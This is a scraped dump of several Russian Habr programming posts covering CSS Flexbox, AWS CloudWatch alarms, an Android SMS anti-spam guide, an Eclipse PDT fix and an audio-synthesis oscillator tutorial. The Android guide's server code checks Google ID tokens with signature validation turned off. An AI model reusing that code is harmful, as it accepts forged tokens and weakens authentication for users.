Заменяем any и {} на соответствующий тип данных, let на const, убираем то, что не используется. Запускаем npm run lint и смотрим
Проблемы все еще остаются, но в нашем случае они не существенны. Надеюсь это было полезно. [Продолжение](https://habr.com/ru/post/650075/). | https://habr.com/ru/post/648881/ | null | ru | null |
# Используем CSS Flexible Box Layout Module. Часть 1: Введение
В данной статье мы рассмотрим использование модели [CSS Flex Box](http://www.w3.org/TR/2015/WD-css-flexbox-1-20150514/), предназначенной для дизайна пользовательского интерфейса в браузере. В этой модели дети контейнера flex (гибкий) могут располагаться в любом направлении, адаптируя свои размеры: расти, чтобы занять неиспользуемое место или сжиматься, чтобы предотвратить переполнение родительского элемента. Можно легко перемещать детей по вертикальной и горизонтальной оси. Возможность вложения контейнеров flex друг в друга (по горизонтальной оси внутри вертикальной и наоборот) позволяет создавать макеты в двух измерениях.
В CSS 2.1 есть 4 режима разметки — алгоритма, определяющего размер и позиции элементов на основе их отношений с соседними элементами:
* блочная (block) разметка, спроектированная для документов;
* inline разметка для текста;
* табличная (table) разметка для 2D данных в табличном формате;
* позиционная (positioned) разметка для явного позиционирования элементов без учета других в документе.
Этот модуль предоставляет новый режим разметки flex, спроектированный для сложных приложений и веб-страниц.
#### **Обзор**
Разметка flex внешне похожа на блочную разметку. В ней отсутствуют многие сложные свойства, относящиеся к тексту и домументам, которые могут быть использованы в блочной разметке, такие как [поплавки (float)](http://www.w3.org/TR/CSS21/visuren.html#floats) и [колонки](http://www.w3.org/TR/css3-multicol/). В то же время эта разметка содержит мощные и простые инструменты для распределения пространства и выравнивания контента способами, которые часто нужны для веб-приложений и сложных страниц.
Содержимое контейнера flex:
* может быть размещено в любом направлении ([flow direction](http://www.w3.org/TR/2015/WD-css-flexbox-1-20150514/#flex-direction-property)) (слева направо, справа налево, снизу вверх, сверху вниз).
* может иметь обратный (reversed) или переставленный (rearranged) порядок отображения на уровне стиля (визуальный порядок может не зависеть от источника).
* может быть размещено линейно вдоль единой (основной, [main](http://www.w3.org/TR/2015/WD-css-flexbox-1-20150514/#main-axis)) оси или обернуто ([wrapped](http://www.w3.org/TR/2015/WD-css-flexbox-1-20150514/#flex-wrap-property)) во множество строк вокруг вторичной ([cross](http://www.w3.org/TR/2015/WD-css-flexbox-1-20150514/#cross-axis)) оси;
* может изменять свои размеры в зависимости от доступного пространства;
* может быть [выровнено](http://www.w3.org/TR/2015/WD-css-flexbox-1-20150514/#alignment) по отношению к родительскому контейнеру или к соседним;
* может быть динамически [сжато](http://www.w3.org/TR/2015/WD-css-flexbox-1-20150514/#visibility-collapse) и разжато по [основной](http://www.w3.org/TR/2015/WD-css-flexbox-1-20150514/#main-axis) (main) оси, сохраняя размер контейнера по [вторичной](http://www.w3.org/TR/2015/WD-css-flexbox-1-20150514/#cross-size) (cross) оси.
##### **Пример 1**
В этом примере каталога каждый элемент имеет название, фотографию, описание и кнопку заказа. Каждый элемент имеет одинаковый размер, фотография над текстом, кнопка покупки выровнена в нижней части элемента вне зависимости от длины описания элемента.
Разметка Flex помогает в следующих аспектах дизайна:
* каталог использует разметку flex для размещения элементов по горизонтали и обеспечивает равную высоту элементов в строке. Каждый элемент — сам по себе контейнер flex, размещающий элементы вертикально.
* Для каждого элемента на странице-источнике контент логически располагается иначе, чем требуется в визуализации: сперва название, далее описание и фото. Это обеспечивает удобный порядок при подготовке контента, а не для браузера. Для более убедительного визуального представления мы используем [order](http://www.w3.org/TR/2015/WD-css-flexbox-1-20150514/#propdef-order) (порядок) для перемещения картинки снизу на верх контента и [align-self](http://www.w3.org/TR/2015/WD-css-flexbox-1-20150514/#propdef-align-self) для размещения по центру по горизонтали.
* Использование [auto margin](http://www.w3.org/TR/2015/WD-css-flexbox-1-20150514/#auto-margins) (авто поля) до кнопки заказа позволяет ей быть снизу каждого из контейнеров вне зависимости от высоты описания.
*index.html*
```
CSS Flexible Layout Module. Example 1.
VPS-512
=======
Быстрая и надежная VPS по доступной цене.

ЗАКАЗАТЬ ПРЯМО СЕЙЧАС ЗА 200 РУБЛЕЙ В МЕСЯЦ
VPS-2048
========
Больше ресурсов, чтобы ваши проекты летали.

ЗАКАЗАТЬ ПРЯМО СЕЙЧАС ЗА 600 РУБЛЕЙ В МЕСЯЦ
```
*index.css*
```
#deals {
display: flex; /* Flex layout so items have equal height Благодаря разметке Flex элементы имеют одинаковую высоту. */
flex-flow: row wrap; /* Размещаем элементы горизонтально и позволяем переносы на несколько строк. */
}
.sale-item {
display: flex; /* Для каждого элемента используем flex. */
flex-flow: column; /* Размещаем контент элемента вертикально. */
margin-right: 4mm;
}
.sale-item > img { /*Для каждой картинки внутри класса sale-item */
order: -1; /* Размещаем элемент перед всеми остальными в визуальном отображении. */
align-self: center; /* Горизонтально размещаем картинку по центру. */
}
.sale-item > button { /*Для каждой кнопки внутри класса sale-item. */
margin-top: auto; /* Авто отступ сверху прижимает кнопку к низу контейнера. */
background: green;
color: white;
border: none;
padding: 2mm;
font-weight: bold;
}
.sale-item > h1, p {
align-self: center;
text-align: center;
}
```
[](http://infobox.ru/vps/linux)
Модуль Flex расширяет определение свойства [display](http://dev.w3.org/csswg/css2/visuren.html#propdef-display) в CSS 2.1, добавляя новый блочный (block-level) flex и встроенный (inline-level) inline-flex тип отображения и определяет новый тип форматирования контента со свойствами управления его разметкой. Никакие из этих свойств, определенных в модуле, не применяются к псевдо-элементам [::first-line](http://dev.w3.org/csswg/css-pseudo-4/#selectordef-first-line) и ::first-letter.
Если вы нашли ошибку в статье, пожалуйста напишите в ЛС или [на почту](mailto:trukhinyuri@infoboxcloud.com). Если вы не можете оставлять комментарии на Хабре, напишите в [Сообществе InfoboxCloud](https://infoboxcloud.ru/community/blog/frontend/270.html).
Продолжение следует… | https://habr.com/ru/post/262545/ | null | ru | null |
# Остановка неиспользуемых хостов через CloudWatch
Привет! 
Многие сталкивались с тем, что ресурсы системы простаивают. Обычная практика борьбы с простоем — удаление из системы этих ресурсов. С практической точки зрения на AWS, мы уже давно имеем инструменты терминировать простаивающие EC2 инстансы. Но это иногда не практично.
Возьмём ситуацию, когда при каждом старте нового инстанса при автоскейлинге, он каждый раз конфигурируется и обновляет софт. Т.е. это занимает определённое время и требует определённых взаимодействий. И вот каждый раз при скейлдауне эти инстансы выключаются и удаляются, а при скейлауте — поднимаются и снова конфигурируются. Как бы было хорошо, если бы инстансы просто выключались, а не удалялись!
С сегодняшнего дня мы имеем возможность в алармах, основанных на метриках CloudWatch устанавливать поведение инстансов. Нам доступны:
* Остановка — Stop
* Удаление — Terminate

При создании аларма через CLI так же можно указать что делать:
```
-- alarm-actions arn:aws:automate:us-east-1:ec2:stop
-- alarm-actions arn:aws:automate:us-east-1:ec2:terminate
```
Как всегда AWS добавляет ещё больше гибкости в вопросы высокодоступности (High Availability) приложений. | https://habr.com/ru/post/165215/ | null | ru | null |
# Советы и рецепты начинающему Android программисту
Добрый день, уважаемые хабраюзеры.
В данной статье я хочу поделиться своим опытом разработки под Android.
Требования к функционалу разрабатываемого продукта породили различные технические задачи, среди которых были как тривиальные, разжеванные во множестве блогов, так и крайне неоднозначные, с неочевидным решением. Я столкнулся с массой вещей, незнакомых мне, как .NET разработчику. Узнал о существовании инструментов, которые значительно упрощают жизнь. Думаю, что каждый начинающий андроидовец проходит похожий путь. Я мог бы сэкономить до трети времени, потраченного на разработку, поиск и эксперименты, имея такую статью.
Поэтому в данном посте я предлагаю вашему вниманию сборник рецептов и советов, которые помогут быстрей и правильней создать Ваше приложение.
Статья предназначена для начинающих, но и опытные разработчики смогут найти полезные моменты. Предполагается, что вы прочитали основы построения Android приложений, знаете о замечательном ресурсе [StartAndroid](http://startandroid.ru/ru/uroki/vse-uroki-spiskom) и умеете делать HelloWorld. При этом опыта создания полноценных приложений у вас нет, и вы только что занялись устранением этого недостатка. Для меня же это был первый проект под Android.
#### **Начало**
Мы с напарником давно подумывали создать какой-нибудь интересный продукт для Google Play. В один прекрасный день, при прочтении очередной СМС с рекламой такси, возникла идея создать приложение, которое будет бороться с СМС спамом. Это показалось нам интересным, имеющим практическое применение, относительно несложным в реализации для небольшой команды.
Далее был выработан набор конкретных требований и сформирован набор задач, которые надо решить. Самые интересные из них:
* [Подготовка проекта](#Prepare)
* [Получение и разбор CMC](#Sms)
* [Автозапуск приложения при загрузке телефона](#Autorun)
* [Осуществление веб запросов](#Web)
* [Хранение данных в локальной БД](#Sqlite)
* [Хранение настроек](#Preference)
* [Авторизация посредством токена Google](#Token)
* [Работа с механизмом покупок](#Billing)
Опущены в статье будут следующие моменты:
* Верстка и дизайн
* Все, что касается чисто Java кода
* Архитектура приложения
#### **Подготовка проекта**
HelloWorld, и шаблонный проект Android приложения мы создавать уже умеем. Теперь посмотрим, что нам может понадобиться еще. Зная о существовании этих инструментов, легко найти в интернете, как их применять. Ведь основная проблема — это не понять, как использовать инструмент, а узнать, что он вообще есть.
1) [ActionBarSherlock](http://actionbarsherlock.com/) необходим для реализации платформонезависимого ActionBar — меню вверху экрана. Качаем с официального сайта и импортируем в Workspace в виде исходников. Просто библиотеки (jar файла) будет недостаточно, так как есть известная проблема с недогрузкой некоторых ресурсов библиотекой.
2) Импортируем в Workspace в виде исходников Google play services из SDK sdk\extras\google\google\_play\_services\libproject\google-play-services\_lib\. Это понадобится для биллинга и авторизации.
3) Положим в папку lib проекта библиотечки (перед этим найдем их в интернете)
\* acra.jar — для реализации механизма отправки отчетов о краше приложения: [ACRA](https://github.com/ACRA/acra/wiki/BasicSetup).
\* android-support-v4.jar — для реализации совместимости со старыми версиями Android.
\* roboguice-2.0.jar, roboguice-sherlock-1.5.jar — для реализации Dependency Injection, если понравится реализация его в roboguice.
\* ormlite-core.jar, ormlite-android.jar — популярная «легковесная» [ORM для sqlite базы Android](http://habrahabr.ru/post/143431/).
\* joda-time.jar — библиотека для работы с датами.
\* jdom.jar, gson.jar — для работы с JSON.
\* checkout.jar — для биллинга (выбрал эту библиотечку, [Checkout](http://habrahabr.ru/post/233265/) как более удобную, чем работа непосредственно с api).
#### **Получение и разбор CMC**
Ниже я приведу способ, работающий на Android с версией ниже 4.4 (KitKat), посколько в данной версии Google радикально поменял подход к обработке CMC. Описание работы с KitKat добавлю позже, когда это будет реализовано мной в приложении.
Для работы с CMC нам нужно разрешение в манифесте:
```
```
где
RECEIVE\_SMS — разрешение приложению получать CMC.
READ\_SMS — разрешение на чтение смс из памяти телефона. Казалось бы, оно нам не нужно, но без этого разрешения не работает запись.
WRITE\_SMS — разрешение на запись CMC в память телефона.
Создадим прослушиватель события «принято CMC» SmsBroadcastReceiver. Он будет вызываться в момент получения телефоном СМС и запускать выполнение основных процессов по обработке СМС.
**SmsBroadcastReceiver**
```
//BroadcastReceiver обязательный предок прослушивателей системных событий
public class SmsBroadcastReceiver extends BroadcastReceiver {
@Override
public void onReceive(Context context, Intent intent) {
//Интент - входной объект с данными, передаваемый всем прослушивателям
Bundle bundle = intent.getExtras();
//Извлекаем из словаря некий pdus - в нем информация о СМС
Object[] pdus = (Object[]) bundle.get("pdus");
if (pdus.length == 0) {
return; // Что то пошло не так
}
// читаем CMC
Sms sms = SmsFromPdus(pdus, context);
// определям, спам ли
Boolean isClearFromSpam = SuperMegaMethodForResolving Spam(sms, context);
if (!isClearFromSpam) {
// если это спам - прекращаем обработку CMC системой
abortBroadcast();
return;
}
}
private Sms SmsFromPdus(Object[] pdus, Context context) {
Sms sms = new Sms();
for (int i = 0; i < pdus.length; i++) {
SmsMessage smsMessage = SmsMessage.createFromPdu((byte[]) pdus[i]);
sms.Text += smsMessage.getMessageBody(); //соберем весь текст (CMC может быть "многостраничной")
}
SmsMessage first = SmsMessage.createFromPdu((byte[]) pdus[0]);//из первой страницы получим
sms.SenderId = first.getOriginatingAddress(); //отправителя
Date receiveDate = new Date(first.getTimestampMillis()); //дату
sms.RecieveDate = receiveDate;
sms.Status = first.getStatus(); //статус (новое, прочтено, доставлено)
return sms;
}
}
public class Sms{
public String SenderId;
public String Text;
public Date RecieveDate;
public int Status;
}
```
Очень важно, чтобы onReceive отрабатывал менее чем за 10 секунд. Если метод захватывает управление на больший срок, исполнение прерывается и событие отдается другим обработчикам в порядке приоритета.
В моем случае в SuperMegaMethodForResolving происходит проверка на наличие СМС в списке контактов и в локальном списке отправителей, что занимает менее секунды. Затем управление отдается в выделенный поток, а onReceive вызывает abortBroadcast, что не дает другим обработчикам получить СМС (в том числе базовому приложению для СМС).
После нам необходимо подписать SmsBroadcastReceiver на событие приёма CMC. Для этого в блоке application манифеста объявим прослушиватель события android.provider.Telephony.SMS\_RECEIVED с именем SmsBroadcastReceiver, который слушает системное событие SMS\_RECEIVED и имеет приоритет 2147483631. Приоритет может быть до 2^31. При этом Google не рекомендует использовать значения больше 999. Но многие приложения их используют, а мы хотим, чтобы антиспам перехватывал CMC до того, как оно будет прочтено, например, приложением Contacts+. Это приложение запрашивает самый высокий из известных мне приоритетов.
```
```
#### **Автозапуск приложения при загрузке телефона**
Запуск приложения после включения устройства может понадобиться для, например, уведомления пользователя о существовании еще непроверенных подозрительных СМС посредством нотификации.
Для автозагрузки потребуется разрешение в манифесте:
```
```
где
RECEIVE\_BOOT\_COMPLETED — разрешение слушать событие «загрузка»
Создадим прослушиватель события «загрузка» ServiceBroadcastReceiver.
```
public class ServiceBroadcastReceiver extends BroadcastReceiver {
@Override
public void onReceive(Context context, Intent intent) {
//Сделаем что-нибудь
}
}
```
В нем мы будем выполнять необходимые нам действия после включения телефона.
Затем потребуется подписать ServiceBroadcastReceiver на событие загрузки телефона. Для этого в блоке application манифеста объявим прослушиватель события android.intent.action.BOOT\_COMPLETED с именем SmsBroadcastReceiver.
```
```
#### **Осуществление веб запросов**
Итак, у нас есть CMC, и надо связаться с сервером. Дополним манифест следующим образом:
```
```
где
INTERNET — разрешение отправлять веб запрос.
ACCESS\_NETWORK\_STATE — разрешение на чтение статуса сети (подключен или нет 3g или wifi).
Осуществление запросов тривиально, для них используем базовый Android http client: org.apache.http.client.HttpClient.
#### **Хранение данных в локальной БД**
Делаем все так, как описано [здесь](http://habrahabr.ru/post/143431/).
#### **Хранение настроек**
Для хранения настроек приложения мы не используем app.config, \*.ini или БД приложения, поскольку Android предоставляет нам механизм [SharedPreferences](http://startandroid.ru/ru/uroki/vse-uroki-spiskom/73-urok-33-hranenie-dannyh-preferences.html).
#### **Авторизация посредством токена Google**
Это отняло у меня больше всего времени, из-за несистематизированности и неполноты информации, включая документацию Google. Итак, наша задача — получить от Google через приложение подписанный токен с информацией о пользователе и секретными сведениями о приложении. Это даст нам основание полагать, что токен сгенерирован не злоумышленником. Для решения этой задачи используем механизм [CrossClientAuth](https://developers.google.com/accounts/docs/CrossClientAuth).
Необходимо сделать следующее:
1) Получить сертификат приложения и подписать им приложение. Это просто осуществить в Eclipse с помощью мастера. Нажмем правой кнопкой мыши на проекте в Package Explorer -> Android tools -> Export signed application package. Мастер предложит создать новое хранилище сертификата, сгенерировать сертификат и поместить его в хранилище, защищенное указанным нами паролем. Не забудем сохранить хеш сертификата, поскольку он в дальнейшем понадобится.
2) Создать проект в [консоли Google](https://console.developers.google.com/project). Затем открыть созданный проект и перейти на вкладку Api & auth -> Credentials в панели слева. Здесь необходимо создать пару Client Id для работы серверной части и Android клиента. Жмем Create new Client ID, нам нужен Client ID for Android application.

Заполняем, как указано на скриншоте, указав корректное имя пакета и отпечаток сертификата. После завершения создания получим табличку с информацией и сгенерированным для нас «CLIENT ID». Он понадобится нам на сервере.
Затем создаем новый Client Id типа Web application. В моем случае адреса можно указать произвольно, так как у нас не будет взаимодействия по http с веб ресурсами Google. В результате получим новый CLIENT ID, он уже понадобится на клиенте.
3) Клиентский код в полном виде можно найти в интернете, например [GoogleAuthUtil](http://developer.android.com/reference/com/google/android/gms/auth/GoogleAuthUtil.html). Отмечу только ключевые моменты: как правильно составить Scope, и откуда взять для него Id
**Код**
```
//выбор аккаунта
@Override
protected void onActivityResult(int requestCode, int resultCode, Intent data) {
if (requestCode == REQUEST_CODE_PICK_ACCOUNT) {
if (resultCode == RESULT_OK) {
Email = data.getStringExtra(AccountManager.KEY_ACCOUNT_NAME);
getUsername();
}
}
super.onActivityResult(requestCode, resultCode, data);
}
private void pickUserAccount() {
String[] accountTypes = new String[] { "com.google" };
Intent intent = AccountPicker.newChooseAccountIntent(null, null, accountTypes, false, null, null, null, null);
startActivityForResult(intent, REQUEST_CODE_PICK_ACCOUNT);
}
//Код получения токена (по хитрому обернутый Try catch и в фоновом потоке
//WEB_CLIENT_ID из Client ID for web application
final private String WEB_CLIENT_ID = "1999999-aaaaaaaaaaaaaaaaaaaaaaaaa.apps.googleusercontent.com";
//"Область" применения Client id. Тут указано что мы хотим аутентификацию
String SCOPE = String.format("audience:server:client_id:%s", WEB_CLIENT_ID);
//Вот и токен
String token = GoogleAuthUtil.getToken(_activity, Email, SCOPE);
```
Осталось передать токен серверу
4) Серверный код для проверки токена
Используем Microsoft.IdentityModel.Tokens.JWT [Nuget](https://www.nuget.org/packages/System.IdentityModel.Tokens.Jwt/). Нижеприведенный код позволяет получить GoogleId юзера и его Email.
**Код**
```
public string GetUserIdByJwt(string jwt, out string userEmail)
{
userEmail = string.Empty;
string userId = null;
//Секретный Client ID веб сервиса (Client ID for web application)
string audience = "111111111111111111-aaaaaaaaaaaaaaaaaaaaa.apps.googleusercontent.com";
//Секретный Client ID приложения (Client ID for Android application)
string azp = "1111111111111-aaaaaaaaaaaaaaaaaaaaaaaa.apps.googleusercontent.com";
var tokenHandler = new JWTSecurityTokenHandler();
SecurityToken securityToken = tokenHandler.ReadToken(jwt);
var jwtSecurityToken = securityToken as JWTSecurityToken;
userEmail = GetClaimValue(jwtSecurityToken, "email");
userId = GetClaimValue(jwtSecurityToken, "id");
var validationParameters =
new TokenValidationParameters()
{
AllowedAudience = audience,
ValidIssuer = "accounts.google.com",
ValidateExpiration = true,
//с либами для токенов некоторая неразбериха.
//По какой то причине не удалось заставить проверять подпись Google
//в токене средствами Microsoft.IdentityModel
ValidateSignature = false,
};
try
{
//Выкинет Exception, если токен не валидный
ClaimsPrincipal claimsPrincipal = tokenHandler.ValidateToken(jwtSecurityToken, validationParameters);
//Сверим, что наши Client Id совпадают с токеновскими
bool allGood = ValidateClaim(jwtSecurityToken, "azp", azp) && ValidateClaim(jwtSecurityToken, "aud", audience);
if (!allGood)
{
userId = null;
}
}
catch
{
userId = null;
}
return userId;
}
//Сверим значение в Claim с ожидаемым
private static bool ValidateClaim(JWTSecurityToken securityToken, string type, string value)
{
string claim = GetClaimValue(securityToken, type);
if (claim == null)
return false;
return claim == value;
}
//Получим значение из Claim (по сути KeyValuePair)
private static string GetClaimValue(JWTSecurityToken securityToken, string type)
{
var claim = securityToken.Claims.SingleOrDefault(x => x.Type == type);
if (claim == null)
return null;
return claim.Value;
}
```
#### **Работа с механизмом покупок**
Для начала необходимо в девелоперской [консоли Google](https://play.google.com/apps/publish/) у проекта приложения на вкладке КОНТЕНТ ДЛЯ ПРОДАЖИ создать нужные товары. Клиент будем писать на базе примеров [Checkout](http://habrahabr.ru/post/233265/). Здесь приведу выдержки из своего кода, касающиеся биллинга, для более полного понимания библиотеки Checkout.
**Изменения в классе Application**
```
public class MyApplication extends Application {
private static final Products products = Products.create().add(IN_APP,
asList("Ид вашего товара из консоли гугл", "Ид вашего товара2 из консоли гугл"));
private final Billing billing = new Billing(this, new Billing.Configuration() {
@Nonnull
@Override
public String getPublicKey() {
String base64EncodedPublicKey = "ЛИЦЕНЗИОННЫЙ КЛЮЧ ДЛЯ ЭТОГО ПРИЛОЖЕНИЯ, который вы можете взять на вкладке СЛУЖБЫ И API консоли разработчика";
return base64EncodedPublicKey;
}
@Nullable
@Override
public Cache getCache() {
return Billing.newCache();
}
});
@Nonnull
private final Checkout checkout = Checkout.forApplication(billing, products);
@Nonnull
private static MyApplication instance;
public MyApplication() {
instance = this;
}
@Override
public void onCreate() {
super.onCreate();
billing.connect();
}
@Nonnull
public static MyApplication get() {
return instance;
}
@Nonnull
public Checkout getCheckout() {
return checkout;
}
}
```
**Активити с покупкой**
```
public class BillingActivity extends RoboSherlockActivity {
private Sku _skuAccess;
@Nonnull
protected final ActivityCheckout checkout = Checkout.forActivity(this,
MyApplication.get().getCheckout());
@Nonnull
protected Inventory inventory;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
_skuAccess = null;
_activity = this;
checkout.start();
checkout.createPurchaseFlow(new PurchaseListener());
inventory = checkout.loadInventory();
inventory.whenLoaded(new InventoryLoadedListener());
}
@Override
protected void onActivityResult(int requestCode, int resultCode, Intent data) {
super.onActivityResult(requestCode, resultCode, data);
checkout.onActivityResult(requestCode, resultCode, data);
}
@Override
protected void onDestroy() {
checkout.stop();
checkout.destroyPurchaseFlow();
super.onDestroy();
}
@Nonnull
public ActivityCheckout getCheckout() {
return checkout;
}
public void Buy(View view) {
purchase(_skuAccess);
}
private void purchase(@Nonnull final Sku sku) {
boolean billingSupported = checkout.isBillingSupported(IN_APP);
if (!billingSupported) {
return;
}
checkout.whenReady(new Checkout.ListenerAdapter() {
@Override
public void onReady(@Nonnull BillingRequests requests) {
requests.purchase(sku, null, checkout.getPurchaseFlow());
}
});
}
private class PurchaseListener extends BaseRequestListener {
@Override
public void onSuccess(@Nonnull Purchase purchase) {
onPurchased();
}
private void onPurchased() {
//перегрузим инвентарь - и после загрузки инвентаря проверим покупку и обработаем это в приложении
inventory.load().whenLoaded(new InventoryLoadedListener());
}
@Override
public void onError(int response, @Nonnull Exception ex) {
// it is possible that our data is not synchronized with data on
// Google Play => need to handle some errors
if (response == ResponseCodes.ITEM\_ALREADY\_OWNED) {
onPurchased();
} else {
super.onError(response, ex);
}
}
}
private class InventoryLoadedListener implements Inventory.Listener {
private String \_purchaseOrderId;
@Override
public void onLoaded(@Nonnull Inventory.Products products) {
final Inventory.Product product = products.get(IN\_APP);
if (product.isSupported()) {
boolean isPurchased = InspectPurchases(product);
//Делаем что-нибудь
}
}
private boolean InspectPurchases(Product product) {
List skus = product.getSkus();
Sku sku = skus.get(0); //допустим один товар
final Purchase purchase = product.getPurchaseInState(sku,
Purchase.State.PURCHASED);
boolean isPurchased = purchase != null
&& !TextUtils.isEmpty(purchase.token);
if (isPurchased) {
//Может уже куплено?
return true;
}
else {
//если нет - запомним товар для покупки
\_skuAccess = sku;
return false;
}
}
}
private abstract class BaseRequestListener implements
RequestListener {
@Override
public void onError(int response, @Nonnull Exception ex) {
}
}
}
```
#### **Заключение**
На этом пока все. Если Вам захочется подробней разобрать какой-либо аспект — напишите и я дополню статью. Надеюсь, пост поможет начинающим Android программистам наломать меньше граблей, не наступать на дрова и сэкономить время. Опробовать готовое приложение можно [тут](https://play.google.com/store/apps/details?id=su.Jalapeno.AntiSpam.Filter). | https://habr.com/ru/post/240045/ | null | ru | null |
# Испорченный PDT
Привет. Данный топик, будет интересен только тем, кто знает, что такое Eclipse PDT и пользуется им ;)
Сама суть.
Есть два проекта, один благополучно работает с PDT, а второй не чем не отличаясь не хочет.
В чем проблема?
**.project Game**
`xml version="1.0" encoding="UTF-8"?
game
org.eclipse.php.core.PhpIncrementalProjectBuilder
org.eclipse.wst.validation.validationbuilder
org.eclipse.php.core.PHPNature`
и **.project Flex**
`xml version="1.0" encoding="UTF-8"?
flex`
Сразу видна разница ;)
Добавляем в Flex:
`org.eclipse.php.core.PhpIncrementalProjectBuilder
org.eclipse.php.core.PHPNature`
И вуаля! Все работает :) | https://habr.com/ru/post/17262/ | null | ru | null |
# Создание аудиоплагинов, часть 6
Все посты серии:
[Часть 1. Введение и настройка](http://habrahabr.ru/post/224911/)
[Часть 2. Изучение кода](http://habrahabr.ru/post/225019/)
[Часть 3. VST и AU](http://habrahabr.ru/post/225457/)
[Часть 4. Цифровой дисторшн](http://habrahabr.ru/post/225751/)
[Часть 5. Пресеты и GUI](http://habrahabr.ru/post/225755/)
[Часть 6. Синтез сигналов](http://habrahabr.ru/post/226439/)
[Часть 7. Получение MIDI сообщений](http://habrahabr.ru/post/226573/)
[Часть 8. Виртуальная клавиатура](http://habrahabr.ru/post/226823/)
[Часть 9. Огибающие](http://habrahabr.ru/post/227475/)
[Часть 10. Доработка GUI](http://habrahabr.ru/post/227601/)
[Часть 11. Фильтр](http://habrahabr.ru/post/227791/)
[Часть 12. Низкочастотный осциллятор](http://habrahabr.ru/post/227827/)
[Часть 13. Редизайн](http://habrahabr.ru/post/228267/)
[Часть 14. Полифония 1](http://habrahabr.ru/post/231513/)
[Часть 15. Полифония 2](http://habrahabr.ru/post/231923/)
[Часть 16. Антиалиасинг](http://habrahabr.ru/post/232153/)
---
После улучшений интерфейса пора бы заняться и программированием. В этом посте мы сгенерируем классические синус, пилу, треугольник и меандр.
Начнем с копирования предыдущего проекта скриптом duplicate:
`./duplicate.py DigitalDistortion/ Synthesis YourName`
В Xcode cнова придется внести изменения в *“Run”* (*Product → Scheme → Edit Scheme…*), чтобы сборка запускалась вместе с проектом REAPER, как [описывалось ранее](http://habrahabr.ru/post/225457/). Если он жалуется на то, что не может найти AU, нужно будет изменить имена и ID в *resource.h* или удалить *DigitalDistortion.component*.
Класс Oscillator
----------------
Материал этой статьи целиком относится к теме DSP. Мы не будем просто писать весь новый код внутри функции `ProcessDoubleReplacing`. Вместо этого создадим класс `Oscillator`, будем вызывать его функции из `ProcessDoubleReplacing`, и он будет наполнять выходной буфер значениями типа `double` для создания формы волны. Сначала используем интуитивный подход. Позже, столкнувшись с недостатками этого подхода, мы найдем способ добиться лучшего звучания.
Давайте создадим новый класс. На Mac File → New → File…:

На Windows правым кликом по проекту, Add →Class:

Назовем его *Oscillator*. Убедитесь, что *Oscillator.cpp* компилируется. В Xcode в таргете AU нажмите на *Build Phases*. Щелкните по плюсу под *Compile Sources* и добавьте *.cpp* файл (это надо будет сделать для каждого таргета):

Давайте напишем заголовок. Вставьте следующий код между `#define` и `#endif` в *Oscillator.h*:
```
#include
enum OscillatorMode {
OSCILLATOR\_MODE\_SINE,
OSCILLATOR\_MODE\_SAW,
OSCILLATOR\_MODE\_SQUARE,
OSCILLATOR\_MODE\_TRIANGLE
};
class Oscillator {
private:
OscillatorMode mOscillatorMode;
const double mPI;
double mFrequency;
double mPhase;
double mSampleRate;
double mPhaseIncrement;
void updateIncrement();
public:
void setMode(OscillatorMode mode);
void setFrequency(double frequency);
void setSampleRate(double sampleRate);
void generate(double\* buffer, int nFrames);
Oscillator() :
mOscillatorMode(OSCILLATOR\_MODE\_SINE),
mPI(2\*acos(0.0)),
mFrequency(440.0),
mPhase(0.0),
mSampleRate(44100.0) { updateIncrement(); };
};
```
Для обозначения того, какую форму волны будет генерировать наш осциллятор, используем `enum`. Сейчас по умолчанию будет генерироваться синус, но это можно изменить при помощи функции-члена класса `setMode`.
Объект класса хранит частоту, фазу и частоту семплирования. Значение фазы будет постоянно меняться, т. к. оно содержит в себе информацию о том, в каком моменте цикла генерации формы волны осциллятор находится. Приращение фазы осуществляется каждый семпл. Для простоты представьте себе, что полный цикл одной волны — это окружность. Значение текущего семпла — это точка на окружности. Соедините эту точку с центром окружности: угол, который образован этим отрезком и осью x и есть значение фазы. А угол, на который этот отрезок будет повернут в следующий момент — это приращение фазы.

В классе есть разные функции для установки значений параметров (для частоты и частоты семплирования, например). Но самая важная функция — это `generate`. Это и есть та самая функция, которая заполняет выходной буфер значениями.
Давайте добавим имплементацию этих функций в *Oscillator.cpp*:
```
void Oscillator::setMode(OscillatorMode mode) {
mOscillatorMode = mode;
}
void Oscillator::setFrequency(double frequency) {
mFrequency = frequency;
updateIncrement();
}
void Oscillator::setSampleRate(double sampleRate) {
mSampleRate = sampleRate;
updateIncrement();
}
void Oscillator::updateIncrement() {
mPhaseIncrement = mFrequency * 2 * mPI / mSampleRate;
}
```
Приращение фазы `mPhaseIncrement` зависит от `mFrequency` и `mSampleRate`, так что оно обновляется каждый раз при изменении одного из этих двух параметров. Мы могли бы вычислять его каждый семпл в `ProcessDoubleReplacing`, но намного лучше делать это здесь.
Функция `generate` на данный момент выглядит так:
```
void Oscillator::generate(double* buffer, int nFrames) {
const double twoPI = 2 * mPI;
switch (mOscillatorMode) {
case OSCILLATOR_MODE_SINE:
// ...
break;
case OSCILLATOR_MODE_SAW:
// ...
break;
case OSCILLATOR_MODE_SQUARE:
// ...
break;
case OSCILLATOR_MODE_TRIANGLE:
// ...
break;
}
}
```
Эта функция будет вызываться каждый раз, когда вызывается `ProcessDoubleReplacing`. `Switch` используется для того, чтобы в зависимости от нужной формы волны исполнялся соответствующий код.
Генерация формы волны
---------------------
Для синуса все просто:
```
case OSCILLATOR_MODE_SINE:
for (int i = 0; i < nFrames; i++) {
buffer[i] = sin(mPhase);
mPhase += mPhaseIncrement;
while (mPhase >= twoPI) {
mPhase -= twoPI;
}
}
break;
```
Обратите внимание, что мы не используем `mFrequency` и `mSampleRate`. Мы даем приращение `mPhase` и ограничиваем его между `0` и `twoPI`. Единственной «сложной» операцией тут является вызов функции `sin()`, которая выполняется на уровне железа на большинстве систем.
Так выглядит пила:
```
case OSCILLATOR_MODE_SAW:
for (int i = 0; i < nFrames; i++) {
buffer[i] = 1.0 - (2.0 * mPhase / twoPI);
mPhase += mPhaseIncrement;
while (mPhase >= twoPI) {
mPhase -= twoPI;
}
}
break;
```
Опять же, интересный момент с записью в буфер. Когда я вижу такие вычисления, мне удобно разбивать их на части:
* `mPhase` возрастает, начиная с `0` и соскакивает обратно в ноль по достижении значения `twoPI`.
* Далее, `(mPhase / twoPI)` возрастает с `0` до `1` и соскакивает обратно в ноль.
* Значит, `(2.0 * mPhase / twoPI)` возрастает от `0`, и соскакивает обратно, как только достигает двух.
